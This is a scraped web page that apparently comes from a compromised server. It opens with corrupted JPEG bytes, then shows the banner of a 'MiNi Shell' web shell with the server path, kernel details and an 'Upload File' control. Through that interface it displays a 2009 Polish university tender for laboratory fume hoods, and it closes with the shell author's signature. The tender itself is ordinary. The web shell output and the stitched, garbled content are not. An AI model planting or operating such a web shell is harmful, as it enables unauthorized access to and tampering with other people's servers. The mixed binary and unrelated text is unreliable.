JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091013/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091013/177217-N-2009.html

<p class="kh_header"><b>Warszawa: Dostawa mebli laboratoryjnych - 6 sztuk dygestoriów dla Wydziału Chemii Uniwersytetu Warszawskiego przy ul. Pasteura 1</b><br>
<b>Numer ogłoszenia: 177217 - 2009; data zamieszczenia: 13.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Warszawski Wydział Chemii , ul. Pasteura 1, 02-093 Warszawa, woj. mazowieckie, tel. 022 8225092, 8220211 w. 271, faks 022 8224880.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.chem.uw.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mebli laboratoryjnych - 6 sztuk dygestoriów dla Wydziału Chemii Uniwersytetu Warszawskiego przy ul. Pasteura 1.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa mebli laboratoryjnych - 6 sztuk dygestoriów do wskazanego przez Zamawiającego pomieszczenia na terenie Wydziału Chemii Uniwersytetu Warszawskiego przy ul. Pasteura 1. Pod pojęciem dostawy mebli laboratoryjnych rozumie się dostawę wraz z transportem, rozładowaniem, wniesieniem, montażem i uruchomieniem mebli laboratoryjnych oraz podłączenie, uruchomienie i sprawdzenie działania tych urządzeń oraz instruktaż pracowników na koszt Wykonawcy. Zapewnienie serwisu po zakończeniu okresu gwarancji.
2.	Szczegółowy opis przedmiotu zamówienia stanowi specyfikacja techniczna przedstawiona w ust 3. Wszystkie podane parametry techniczne są parametrami minimalnymi. Wykonawca może zaproponować sprzęt o parametrach technicznych równoważnych lub wyższych, lecz nie gorszych od wskazanych przez Zamawiającego. W przypadkach, w których Zamawiający dokonał opisu przedmiotu zamówienia w SIWZ przez wskazanie znaków towarowych lub pochodzenia, Wykonawcy zobowiązani są do oferowania urządzeń określonych w opisie przedmiotu zamówienia lub równoważnych o parametrach tego typu, lecz nie gorszych od wskazanych przez Zamawiającego. Do oceny parametrów technicznych będą brane pod uwagę wszystkie parametry techniczne danego sprzętu.
3.	Szczegółowe wymagania techniczne dotyczące 5 sztuk dygestoriów
	Dygestorium 1200 o wym. (dł. x szer. x wys.) 1250x900x2450 [mm],
konstrukcja oparta na stelażu, wykonana ze stalowych profili zamkniętych, malowanych techniką proszkową farbami poliestrowo - epoksydowymi (RAL 7035), na nóżkach o regulowanej wysokości;
	głębokość blatu roboczego 700 mm, blat z litej ceramiki technicznej Fridurit Premium - spiek ceramiczny o zamkniętej strukturze cząsteczek ze zintegrowanym podwyższonym wokół obrzeżem ceramicznym, przednia krawędź o aerodynamicznym profilu,
	wykładka komory z żywicy fenolowej
	modułowy panel instalacyjny pod blatem
	instalacja wodno-kanalizacyjna: 2 ujęcia zimnej wody (zawory Broen), 1x zlewik ceramiczny 295x145 [mm]
	instalacja elektryczna: 4+2 gniazdka elektryczne 16A~230V na IP44, oświetlenie komory, wyłącznik różnicowo-prądowy,
	wyłącznik wentylatora i pompy próżniowej ~16A 230V
	system przewietrzania przez podwójną ścianę
	ściany boczne przeszklone- pod blatem szafka laminowana o podwyższonej odporności chemicznej, wentylowana z wykładką z PP, 1 na 2 miejsce na pompę próżniową
	kratownica ze stali kwasoodpornej (6 prętów pionowych, 2 poziome + łączniki krzyżowe)
	klapa bezpieczeństwa
	blokada okna na poziomie 500 mm
	system AFP zabezpieczający przed niekontrolowanym spadkiem okna
	szyba przednia ze szkła bezpiecznego
4.	Szczegółowe wymagania techniczne dotyczące 1 sztuki dygestorium:
	Dygestorium 1800 o wym. (dł. x szer. x wys.) 1850x900x2450 [mm],
konstrukcja oparta na stelażu, wykonana ze stalowych profili zamkniętych, malowanych techniką proszkową farbami poliestrowo - epoksydowymi (RAL 7035), na nóżkach o regulowanej wysokości;
	głębokość blatu roboczego 700 mm, blat z litej ceramiki technicznej Fridurit Premium - spiek ceramiczny o zamkniętej strukturze cząsteczek ze zintegrowanym podwyższonym wokół obrzeżem ceramicznym, przednia krawędź o aerodynamicznym profilu,
	wykładka komory z żywicy fenolowej
	modułowy panel instalacyjny pod blatem
	instalacja wodno-kanalizacyjna: 2 ujęcia zimnej wody (zawory Broen), 1x zlewik ceramiczny 295x145 [mm]
	instalacja elektryczna: 4+2 gniazdka elektryczne 16A~230V na IP44, oświetlenie komory, wyłącznik różnicowo-prądowy,
	wyłącznik wentylatora i pompy próżniowej ~16A 230V
	system przewietrzania przez podwójną ścianę
	ściany boczne przeszklone- pod blatem szafka laminowana o podwyższonej odporności chemicznej, wentylowana z wykładką z PP, 1 na 2 miejsce na pompę próżniową
	kratownica ze stali kwasoodpornej (6 prętów pionowych fi 10, 2 poziome fi 12 + łączniki krzyżowe)
	klapa bezpieczeństwa- blokada okna na poziomie 500 mm
	system AFP zabezpieczający przed niekontrolowanym spadkiem okna
	szyba przednia ze szkła bezpiecznego
5.	Zamawiający zobowiązuje Wykonawców wyposażenia meblowego do złożenia oświadczeń, że materiały użyte do produkcji mebli laboratoryjnych spełniają wymagane normy i posiadają atesty PZH lub równoważne ( dołączyć stosowne atesty) .
6.	Oferent zobowiązany jest do przedstawienia certyfikatów, deklaracji atestów, których spełnienie warunkuje przyjęcie oferty do oceny:
1)	odnośnie dygestoriów Zamawiający wymaga dołączenia do oferty certyfikatu zgodności z normą PN-EN 14175, wystawionego przez niezależny, akredytowany, uprawniony do tego celu Instytut Badawczy do co najmniej jednego typoszeregu
2)	Certyfikatu wdrożenia i funkcjonowania systemu jakości ISO 9001:2000 w zakresie projektowania, produkcji oraz serwisu systemów zabudowy pomieszczeń laboratoryjnych oraz dygestoriów,
3)	Certyfikatu niezależnego instytutu badawczego potwierdzającego, że zastosowana  lita ceramika techniczna (dotyczy  blatów w stołach, w dygestoriach oraz zlewów i zlewików ceramicznych w stanowiskach do mycia i nadstawkach instalacyjnych) jest spiekiem ceramicznym o najwyższych parametrach użytkowych potwierdzonych certyfikatem niezależnego instytutu badawczego, na którą producent udziela 30 lat gwarancji. Certyfikat oraz gwarancję udzieloną przez producenta ceramiki należy dołączyć do dokumentów.
7.	Ogólne wymagania dotyczące dygestoriów:
1)	dygestoria wykonane zgodnie z normą PN EN - 14 175
2)	blaty z litej ceramiki technicznej ze zintegrowanym, podwyższonym obrzeżem, przód aerodynamiczny,
3)	wykładki dygestoryjne: wykonane z żywic fenolowych grubość wykładki 7-13 mm,
4)	rodzaj i wyposażenie dygestoriów w pomieszczeniach zgodnie ze szczegółową specyfikacją.
8.	Blaty ceramiczne powinny być:
1)	wykonane z litej ceramiki technicznej - spiek ceramiczny o zamkniętej strukturze cząsteczek. 
2)	Blaty robocze montowane na konstrukcji stelaża, nie wymagają żadnych dodatkowych konstrukcji podtrzymujących  ani płyt bazowych. 
3)	Blaty powinny być odporne na wszelkie kwasy, zasady, rozpuszczalniki, i barwniki we wszelkich stężeniach i temperaturach stosowanych w laboratoriach (jedyny wyjątek stanowi kwas HF), odporne na zaplamienie wg normy EN ISO 10545-14 w kategorii 5 oraz odporności chemicznej  wg normy EN ISO 10545-13. Powierzchnia blatu nie powinna zawierać sztucznych barwników i powinna być jednorodna z wnętrzem materiału. Ze względów ochrony środowiska nie dopuszcza się stosowania tzw. glazury chemicznej, ani też wykonanej z materiału innego niż wnętrze blatu.
4)	Grubość ceramiki powinna wynosić: 34mm + - 3% dla litej ceramiki technicznej z podniesionym zintegrowanym obrzeżem ceramicznym (grubość mierzona wraz z obrzeżem) lub 20mm + -5% dla blatów ceramicznych bez obrzeża ceramicznego
5)	Obrzeże ceramiczne powinno być tak skonstruowane aby utrzymać na powierzchni blatu rozlaną ciecz o objętości min. 6 l m2
6)	Nie dopuszcza się technologii malowania jakichkolwiek obrzeży blatów
7)	Wszelkie widoczne obrzeża blatów powinny być glazurowane. W przypadku styku obrzeza blatu ze: ścianą, komorą dygestorium lub sąsiadującym blatem, obrzeża powinny być docięte, a łączenia technologiczne wypełnione masą uszczelniającą o podwyższonej odporności chemicznej. Masa ta winna zachowywać elastyczność i być łatwa do usunięcia w przypadku wymiany.
8)	Blaty ceramiczne powinny się charakteryzować następującymi tolerancjami odchyłek wymiarowych:
-	w przypadku przeciwległych glazurowanych krawędzi:  + - 1% wymiaru
-	w przypadku gdy jedna krawędź jest docięta a druga glazurowana: + -  0,3% wymiaru
-	w przypadku gdy obie krawędzie są docięte: + - 1mm wymiaru
Tolerancja płaskości nie powinna przekraczać 5mm dla blatów o długości większej niż 1200mm
9)	Blaty ceramiczne powinny posiadać: 
-	Atest higieniczny  Zakładu Higieny Komunalnej PZH,
-	Atest higieniczny Zakładu Badania Żywności i Przedmiotów Użytku PZH,
-	Świadectwo z Zakresu Higieny Radiacyjnej o spełnianiu wymogów z zakresu higieny radiacyjnej, zawartych w paragrafie 3 pkt 1  Rozporządzenia Rady ministrów z dnia 3 grudnia 2002 r.,
-	Certyfikat lub Świadectwo wydane przez niezależną instytucję badawczą, potwierdzające  przynajmniej zgodność z normami: EN 993-1, EN 993-5, EN 993-9, EN 821-2, EN ISO 10545-14, EN ISO 10554-11, EN ISO 10545-13,
9.		Osprzęt laboratoryjny:
1)	sposób osadzenia zlewów w blatach: podklejane pod blat, obrzeża wewnętrzne otworów pod zlewy i w blatach-glazurowane ! 
2)	zawory i armatura  powinna  spełniać wymagania pracy w laboratorium a w szczególności ich powierzchnia powinna być odporna chemicznie i odporna na działanie promieni UV,
3)	powierzchnia armatury winna być pokryta powłoką poliestrową w kolorze jasno popielatym,
4)	grubość ścianki wylewek w bateriach wodnych powinna być minimum 1,3mm, maksimum 1,8mm 
5)	armatura i zawory powinny posiadać atest higieniczny Zakładu Higieny Komunalnej PZH
10.	Dygestoria po zainstalowaniu powinny być gotowe do pracy bez konieczności dokonywania dodatkowych zakupów. Cena oferty powinna uwzględniać wszelkie koszty związane z dostawą, instalacją, uruchomieniem, oraz szkoleniem dotyczącym obsługi.
11.	Wykonawca zapewni serwis w miejscu użytkowania urządzenia. Rozpoczęcie naprawy urządzenia powinno nastąpić nie później niż w ciągu 24 godzin od daty zawiadomienia o jego awarii. Usługa serwisowa bezpłatna, wymiana i części na koszt Wykonawcy przez cały okres gwarancji. Minimalna liczba napraw powodująca wymianę urządzenia na nowy - 3 naprawy.
12.	Wykonawca zapewni całościowy przegląd elementów urządzenia na miesiąc przed upływem terminu ich gwarancji.
13.	Wykonawca zobowiązuje się do zapewnienia bieżących konsultacji z obsługą serwisową drogą telefoniczną i internetową.
14.	Zamawiający nie dopuszcza składania ofert częściowych.
15.	Zamawiający nie dopuszcza składania ofert przewidujących odmienny sposób wykonania zamówienia (oferta wariantowa)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 36.12.30.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 28.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 Ustawy.
2.	Ocena spełnienia warunków określonych w art. 22 Ustawy oraz warunków szczegółowych określonych w niniejszym paragrafie - ust. 3 nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń, o których mowa w § 2 niniejszego artykułu.
3.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełnią następujące warunki:
1)	posiadają uprawnienia do wykonywania działalności lub czynności , jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia:
wykażą się wykonaniem, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych w okresie ostatnich trzech lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przynajmniej 5 dostaw mebli laboratoryjnych i dygestoriów, z podaniem ich wartości (nie mniejszej niż 100 000,- PLN brutto-każda z nich), dat wykonania i odbiorców wraz z załączonymi dokumentami potwierdzającymi, że dostawy te zostały wykonane należycie,
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego.
4.	Przedstawia zakres zamówienia, który Wykonawcy wykonają własnymi siłami, a który zamierzają powierzyć podwykonawcom.
5.	Sposób dokonywania oceny spełnienia warunków wymaganych od Wykonawców nastąpi na podstawie dokumentów złożonych przez Wykonawców i oparty będzie na zasadzie TAK/NIE (spełnia / nie spełnia).
6.	Wykonawca potwierdzi spełnienie warunków wymaganych określonych w ust. 3 i 4 niniejszego paragrafu oświadczeniami i dokumentami określonymi w § 2.
7.	Z ubiegania się o udzielenie zamówienia publicznego zostaną wykluczeni Wykonawcy wymienieni w art. 24 Ustawy. Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	W celu wykazania spełnienia warunków udziału w niniejszym postępowaniu, każdy z Wykonawców powinien przedłożyć wraz z ofertą (zgodnie z załączonym do SIWZ formularzem oferty opracowany przez Zamawiającego) następujące oświadczenia i dokumenty (wypełnione i podpisane przez osoby uprawnione do reprezentowania Wykonawcy) zgodnie z odpowiednimi zapisami niniejszej SIWZ:
1)	Formularz Nr 1 - oświadczenie o spełnianiu warunków udziału w postępowaniu. 
		Do formularza Nr 1 Wykonawca zobowiązany jest dołączyć następujące dokumenty:
a)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
b)	pełnomocnictwo do reprezentowania Wykonawcy w niniejszym postępowaniu oraz do podpisania umowy (o ile nie wynika z dokumentów rejestracyjnych); pełnomocnictwo musi być podpisane przez osoby uprawnione do reprezentowania Wykonawcy (podpisy i pieczęcie oryginalne) lub mieć postać aktu notarialnego albo notarialnie potwierdzonej kopii oraz posiadać termin ważności, z którego wynika, że jest obowiązujące dla niniejszego postępowania i zapis, z którego wynika, że obejmuje niniejsze postępowanie, 
2)	Formularz Nr 2 - wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych w okresie ostatnich trzech lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przynajmniej 5 dostaw mebli laboratoryjnych i dygestoriów, z podaniem ich wartości (nie mniejszej niż 100 000,- PLN brutto-każda z nich), dat wykonania i odbiorców wraz z załączonymi dokumentami potwierdzającymi, że dostawy te zostały wykonane należycie,
3)	Szczegółowy opis oferowanych warunków gwarancji, serwisu gwarancyjnego i serwisu pogwarancyjnego.
4)	Szczegółowy opis parametrów technicznych w języku polskim z uwzględnieniem parametrów technicznych wymaganych w art. 3 niniejszej Specyfikacji oraz szczegółowy opis parametrów technicznych stanowiska komputerowego.
2.	Ponadto Wykonawca złoży:
1)	Formularzu Nr 3 - informacja o zatrudnieniu podwykonawców (należy dołączyć w przypadku zatrudnienia podwykonawców) lub oświadczenie o wykonaniu przedmiotu zamówienia własnymi siłami.
2)	Zaleca się, aby Wykonawca sporządził szczegółowe zestawienie wszystkich dostarczanych oświadczeń i dokumentów i dołączył ten spis do oferty, jako Formularz Nr 4
3)	Zaleca się dołączenie zaakceptowanego wzoru umowy - podpisanego na ostatniej stronie przez osoby uprawnione do reprezentowania Wykonawcy.
3.	Wszystkie dokumenty muszą być sporządzone w języku polskim. Dokumenty lub ich kserokopie sporządzane w innym języku muszą być przetłumaczone na język polski. Wykonawca musi złożyć dokument (kserokopię) w języku, w jakim został on sporządzony wraz z tłumaczeniem i poświadczony przez Wykonawcę.
4.	Dokumenty, których aktualność (dzień wystawienia) nie została określona szczegółowo w niniejszym paragrafie muszą być ważne (aktualne) na dzień składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.chem.uw.edu.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> UNIWERSYTET WARSZAWSKI
WYDZIAŁ CHEMII
Dział Administracji i Inwestycji
ul. Pasteura 1
00-927 Warszawa
fax.: 0 22 - 822 48 80.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.10.2009 godzina 11:45, miejsce: UNIWERSYTET WARSZAWSKI
WYDZIAŁ CHEMII
Dział Administracji i Inwestycji
ul. Pasteura 1
00-927 Warszawa.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com